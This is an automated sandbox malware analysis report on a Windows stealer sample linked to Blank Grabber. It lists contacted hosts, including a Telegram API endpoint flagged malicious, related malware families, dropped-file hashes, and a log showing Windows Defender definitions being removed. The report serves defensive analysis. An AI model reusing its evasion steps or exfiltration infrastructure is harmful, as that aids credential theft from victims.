https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C87F90000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.zhihu.com/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://oneget.orgX	powershell.exe, 00000029.00000002.2158201728.000001530176B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png0	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.gofile.io/getServer	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000007.00000002.2265902518.0000016191CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.0000015310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.000001530196F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000029.00000002.2158201728.000001530176B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0	#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.amazon.co.uk/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://json.org	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2060431464.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1487425
Start date and time:	2024-08-04 02:21:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	91
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#U202f#U202f#U2005#U00a0.scr.exe renamed because original name is a hash value
Original Sample Name:	.scr.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winEXE@144/95@2/2
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 86% Number of executed functions: 110 Number of non-executed functions: 168
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.195
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2860 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7908 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
20:22:04	API Interceptor	155x Sleep call for process: powershell.exe modified
20:22:04	API Interceptor	5x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	NaOH.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	SSPInstallerV2.exe	Get hash	malicious	Blank Grabber, Umbral Stealer, XWorm	Browse	ip-api.com/json/?fields=225545
	XWorm.V5.6.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	oc 1337.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Xbox.exe	Get hash	malicious	XWorm, Xmrig	Browse	ip-api.com/line/?fields=hosting
	setup.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	Base.exe	Get hash	malicious	AsyncRAT, Blank Grabber, XWorm	Browse	ip-api.com/json/?fields=225545
	WindowsStartUp.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	aznuril.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	setup.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
149.154.167.220	ShadowCrypter.exe	Get hash	malicious	Clipboard Hijacker, XWorm	Browse
	GhostBinder-FUD.exe	Get hash	malicious	XWorm	Browse
	msedge.exe	Get hash	malicious	XWorm	Browse
	rPI209087.exe	Get hash	malicious	AgentTesla	Browse
	SolaraModified.exe	Get hash	malicious	XWorm	Browse
	aznuril.exe	Get hash	malicious	XWorm	Browse
	setup.exe	Get hash	malicious	XWorm	Browse
	-kredi Karti Hesap #U00d6zeti- 4508 0519.xls.exe	Get hash	malicious	Snake Keylogger	Browse
	-kredi Karti Hesap #U00d6zeti- 4508 0519.pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	hvmBCe45I1.exe	Get hash	malicious	Go Injector	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	NaOH.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	SSPInstallerV2.exe	Get hash	malicious	Blank Grabber, Umbral Stealer, XWorm	Browse	208.95.112.1
	XWorm.V5.6.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	oc 1337.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Xbox.exe	Get hash	malicious	XWorm, Xmrig	Browse	208.95.112.1
	setup.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Base.exe	Get hash	malicious	AsyncRAT, Blank Grabber, XWorm	Browse	208.95.112.1
	WindowsStartUp.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	aznuril.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	setup.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
api.telegram.org	ShadowCrypter.exe	Get hash	malicious	Clipboard Hijacker, XWorm	Browse	149.154.167.220
	GhostBinder-FUD.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	msedge.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	rPI209087.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SolaraModified.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	aznuril.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	setup.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	-kredi Karti Hesap #U00d6zeti- 4508 0519.xls.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	-kredi Karti Hesap #U00d6zeti- 4508 0519.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	hvmBCe45I1.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	https://loker-pt-freeport-indonesia-2024.digitall-co.web.id/	Get hash	malicious	Unknown	Browse	149.154.167.99
	ShadowCrypter.exe	Get hash	malicious	Clipboard Hijacker, XWorm	Browse	149.154.167.220
	GhostBinder-FUD.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	msedge.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	woklsbEMwW.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://creativeservices.netflix.com.sg-vnt-2.sosis-berurat.live/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://creativeservices.netflix.com.sg-vnt-1.sosis-berurat.live/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://creativeservices.netflix.com.sg-vnt-3.sosis-berurat.live/	Get hash	malicious	Unknown	Browse	149.154.167.99
	rPI209087.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SolaraModified.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
TUT-ASUS	NaOH.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	SSPInstallerV2.exe	Get hash	malicious	Blank Grabber, Umbral Stealer, XWorm	Browse	208.95.112.1
	XWorm.V5.6.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	oc 1337.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Xbox.exe	Get hash	malicious	XWorm, Xmrig	Browse	208.95.112.1
	setup.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Base.exe	Get hash	malicious	AsyncRAT, Blank Grabber, XWorm	Browse	208.95.112.1
	WindowsStartUp.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	aznuril.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	setup.exe	Get hash	malicious	XWorm	Browse	208.95.112.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dll	ShadowCrypter.exe	Get hash	malicious	Clipboard Hijacker, XWorm	Browse
	GhostBinder-FUD.exe	Get hash	malicious	XWorm	Browse
	rQTI6IKszT.exe	Get hash	malicious	Unknown	Browse
	LKEAHetlG6.exe	Get hash	malicious	Unknown	Browse
	Base.exe	Get hash	malicious	AsyncRAT, Blank Grabber, XWorm	Browse
	Doc4.docx.doc	Get hash	malicious	Unknown	Browse
	1 (3).exe	Get hash	malicious	Unknown	Browse
	Doc4.docx.doc	Get hash	malicious	Unknown	Browse
	Windows.exe	Get hash	malicious	Python Stealer	Browse
	V3NOM LOGGER 1.05.exe	Get hash	malicious	XWorm	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\??? \Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	674400
Entropy (8bit):	7.922476060998595
Encrypted:	false
SSDEEP:	12288:NDKZM3lTvUyWFppcFKYMR7VnWEDpUQIZQtVy+bCSFGRip1APIKJTJ:N/1ZWFpprBRbZbCSFGREKRJ
MD5:	3A3B63134C9D9CD2E2EB0B8BD859B2D6
SHA1:	FFBC89AF0E9A9F2ECF1391E05065CBEA20F463BA
SHA-256:	46AE8C35FA9240A5CAC298C19AAD7DB7EB289BBBA174F300F9CEE032D0AC2825
SHA-512:	75B01A2C24CDF8BAACDED657FEF6907CF1601C18F78CC542C403FCB0B68FB9264465E934F1B572118B0A08A0AD6AD0550B00FB8A208F63A4780C4BF09F63911F
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.....G...fVm..uf.L.3..3M......gz.{..h.zh@.{/$...{o......"...........B.!.....q.....2..k.-Q{.gE..}..U[.H....;.c.I...<9..;&....g...H.G/....wXb.t.6w:_....'.Q\|.2U...k.,...g.~.....c..M..;../,....].S...~....g.^.t.\|hNL}Z<2.....!L.>...zh$S...~..v.I....sb.......L-....[.S..wq..=....w..TE..w-....l...]i..w...;.2.^....{..`...L...y....[.~>'..>?.o.i(..So.Y......7...}..Z..8.eo..+.So.q(...z.......z..}.[....u...k..z];.Z.z.z.Ogx.-..t..w.._.:..:-..O......+.)L...2..j8.T..by...9.{.U...AW..\|~.O..L...=......g5.V../......W..U..6.80.q..i.......;xn..W....H._.k...../....}.K...^..9../..-...3.......rb..q.uy...c=.........XC....-.;...zz..cm...%ml.~W....s..k.W..........2N......v.(uw...5..;.V.;.^P...l......H.......?.../...-.-..K>s.....\.....9..\|j....;_....3.0..E.....N......pA....2_.s...b...k.c..w....t.{.W...s;..y.z...n....v.s...q.@n...w.c^...Y.......9%.Z}..EN.

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	894
Entropy (8bit):	3.106809372209216
Encrypted:	false
SSDEEP:	12:Q58KRBubdpkoPAGdjrZ4ZuZk9+MlWlLehW51IC44ZOI:QOaqdmOFdjrSA++kWResLIagI
MD5:	F3590D52698AEB56FD49320BD25F81C4
SHA1:	2D95D225C2EA0F491A3D5D402F6929BF018B0468
SHA-256:	58FD51788E100425F4ACDF07AA8796CC226ED0022A30753C36C4A532BD283204
SHA-512:	099FE7E6C2B97A4B592650DA4702B9A2BE2D112E06AD11B985C80F8B253CFA8A45BC21FF700D5D07AD00AD1A65B1C4DF2C63C6CBCB51F607CECB53BBFBDEF863
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.a.t. .. A.u.g. .. 0.3. .. 2.0.2.4. .2.0.:.2.2.:.2.5.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.a.t. .. A.u.g. .. 0.3. .. 2.0.2.4. .2.0.:.2.2.:.2.5.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Users\user\AppData\Local\Temp\QzNtG.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	691454
Entropy (8bit):	7.999715655207366
Encrypted:	true
SSDEEP:	12288:V6csZheMJP68MEJhii/BpF9GRvsnEgc1vgi80kft9UPTcX6FrjvwGivQ86jXHa:V2/JhiwbevwEpI3A9lbavUX6
MD5:	5BFA75FEF9B8CACB8175EEB0B4A9B5D3
SHA1:	046265ADD4F3CC8EDD64F3BD96182BEDE2CAFBC5
SHA-256:	7700B58A64E8B825E61EC754D677D3AF7A0AAC72F6C84A7555D83CC14A3899F0
SHA-512:	6BD21868AF5D780A2FCABA12573073FC68C425F82140FEBCD0B013E8A7DAE6DC224339654D9F1EF4EA2F79B6FED43398831A4AE92127053BB0FAB28A9966B0A2
Malicious:	true
Preview:	Rar!....x.6!..............8F...6.f?.{ru..].Y%.(..%...^.............<DT._Cn.k.....eJ..?.GbV./.d;..;_..)...\|..2nM.~.........%.)m.\.B.@..4P....q4....... Uz. .n...v.~\|.Z.I.Qx<z<!N.]!.c../.....ws.Ce....9..;%.CNW.s.bD...3S..g.......].e...8.3!..A.K....DfeJ....9v>">........KI..H.k.....\.7`{'...Ou.\..E..?.#R.x.s&.)...Xh........l.-.+N=...b..F...o4.&X58.O..]..[....9/.}..d....dw.....^.ay..ZE_Z+..i...G..'".....d._.....}h...!.VVl...Q...&.B...n8..8.+;>....1.U!v}\..Q......(.J7g.F;..B.....\\|..D2.]...d.H.+....1}(.:..VK~...>...j...r.;...H5s-."..0k]x.....^#.a.n...5:...Z....#..B..&...L...m...&..AKC.`bh(V......2.............z.)SK)m......&RW>M.$..Yc0....n{>.Fn...{`.Lh...F:.w..h.L..........F....^Pc..I..O.B.A.[.<7....T..".o.Wc...HL.=..z...5..9.Y.x.N.mxf.......1m...'p:....*..M..[&^%...>.i#..x&[..>.G..o..[.<A......3A..=E.9...nm....g../....L.Sg..y.$.....!\...e`...p.Q..t.(..'{Z...&.ND...~H.}Z.9....Q..../u.G.........Il..G....~i.A..r2y.~..&".@s".`M....\...U...

C:\Users\user\AppData\Local\Temp\RES6756.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sun Aug 4 02:13:43 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1372
Entropy (8bit):	4.126657831616209
Encrypted:	false
SSDEEP:	24:HSq9U7bMKHdwKaZXNeI+ycuZhNYHakS5QPNnqS+d:c7neKaVw1ul2a3CqSe
MD5:	C0D80E40E8E04F02A6363FE554905BE1
SHA1:	1A2C9DC5EFE662CED73284E9D56EB0C2E7F48034
SHA-256:	ED724445A45552BECA8E50B52BD5FF949C1CCECDF42B1EE85CD82783F5E23F5E
SHA-512:	5373020FEA46A0D42BE18ABBDA04B64E584C0124389FF6E441D787492125BF70BD51DA9E98B52D302CEEEFD53D9F8DC344FADE4B067102366008CB4EFEC3243D
Malicious:	false
Preview:	L.....f.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........S....c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP................SM.r...I!6.3.}..........5.......C:\Users\user\AppData\Local\Temp\RES6756.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.u.x.q.e.u.o.y...d.l.l.....(.....L.e.g.a.

C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	119192
Entropy (8bit):	6.6016214745004635
Encrypted:	false
SSDEEP:	1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
MD5:	BE8DBE2DC77EBE7F88F910C61AEC691A
SHA1:	A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
SHA-256:	4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
SHA-512:	0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: ShadowCrypter.exe, Detection: malicious, Browse Filename: GhostBinder-FUD.exe, Detection: malicious, Browse Filename: rQTI6IKszT.exe, Detection: malicious, Browse Filename: LKEAHetlG6.exe, Detection: malicious, Browse Filename: Base.exe, Detection: malicious, Browse Filename: Doc4.docx.doc, Detection: malicious, Browse Filename: 1 (3).exe, Detection: malicious, Browse Filename: Doc4.docx.doc, Detection: malicious, Browse Filename: Windows.exe, Detection: malicious, Browse Filename: V3NOM LOGGER 1.05.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49944
Entropy (8bit):	7.786807948324802
Encrypted:	false
SSDEEP:	1536:uscTnfmhcU0UHpuF/g7Z2Zyqm7zIpCVVB7SyTUxIS:KTnfmCNUUF/wNvIpCVVB+
MD5:	2152FE099CA3E722A8B723EA26DF66C6
SHA1:	1DAAABA933501949E5D0E3D3968F4279DCDE617D
SHA-256:	41EB95B13A115594CA40EACBB73B27233B7A8F40E9DBFBC597B9F64F0A06B485
SHA-512:	5168F3C554BA8F6C1D923A047CA6784C106B56B8E1944113059190E2A9C19BD8722F14106EA7300AB222696E5164EE66D857B5D619328DD29BBB27943B073CF9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R...S..R.....R...W..R...V..R...Q..R...S..R..S..R..S..R..._..R...R..R......R...P..R.Rich.R.........................PE..d....Are.........." ...%.............d....................................................`.............................................H.................... ..,...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	60696
Entropy (8bit):	7.828031934321066
Encrypted:	false
SSDEEP:	1536:ew1k7TaJIRmh4ojzkHhqccsmgvGaCaaY0O4CNXGtQzOPe7IpLPFz7SykACdxU:nJIK4CkBVNGO9XGV+IpLPFzuE
MD5:	1B06133298F03FF20E5D31CB3B0BCA63
SHA1:	0678E26F8D03E2EA0BA8D78D6D14809914D9C0A8
SHA-256:	E92C373CC790A5411681A78ADE2B75ECB03F3CF17AAB7D98C0FB3AFA2254684D
SHA-512:	18C50A5FF69C0C7E19C27039EDA0CADE0E8BC8D617CCA4BC8981DC8A519FA86A05A86B0662AAA493604E9801EDF6A41EE65336332B715188E5E17A60A8154CBC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 2%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......x...<...<...<...5.*.:...)...>...)...0...)...4...)...8.......>...w...=...w...:.......?...<..........:.......=.....F.=.......=...Rich<...........................PE..d....Are.........." ...%............P-.......................................P............`.........................................HL.......I.......@.......................L......................................`9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	108312
Entropy (8bit):	7.933255580303333
Encrypted:	false
SSDEEP:	3072:/ucwkcSosIOPVrF3nuJNX6GllaIpOqTbIU:/tdosVF3nm6Mlb9
MD5:	A6102E46E07E1219F90392D1D89AC4D6
SHA1:	425375D377FDE63532AA567978C58A1F131A41B1
SHA-256:	572116A1ECDC809846F22D3CCD432326A7CFF84969AA0DE5A44E1FBE4C02BCF7
SHA-512:	27BAD2FD9B9953798B21602F942228AAE6CEC23CAC1C160A45C4A321F1D0151CE245A82CCEB65BFCD7412B212CB19E44FFF3B045D7F3BEDAC49FF92D1C4AFFA6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mBP\.,.\.,.\.,.Ut..R.,.Is-.^.,.Is).Q.,.Is(.T.,.Is/.X.,.f.-._.,..t-.^.,.\.-...,.f./.].,.f.!.S.,.f.,.].,.f...].,.f...].,.Rich\.,.........PE..d....Are.........." ...%.p...................................................0............`..........................................,..P....)....... ..........x'...........-..........................................@...........................................UPX0....................................UPX1.....p.......f..................@....rsrc........ .......j..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36632
Entropy (8bit):	7.665340177942189
Encrypted:	false
SSDEEP:	768:Q6nLeqO/i25L2qrKBMK4XpMcfIpOIYe5YiSyvfsAMxkET:rtO/P5ZTKXcfIpOIYU7SyHqxn
MD5:	EE8C405267C3BAAA133E2E8D13B28893
SHA1:	B048112268F8300B3E47E441C346DEA35E55D52A
SHA-256:	462B55CA1A405CF11A20798CF38873A328D3720BBD9E46242CE40A5BC82F47D1
SHA-512:	DA290E352FA759414BBFA84D1C213BE9C5722F5B43AB36AE72EA816E792A04E9AAA5253B935D6ACDC34611F0EF17C2C0E8D181D014CE3CB117B5775E406F820A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
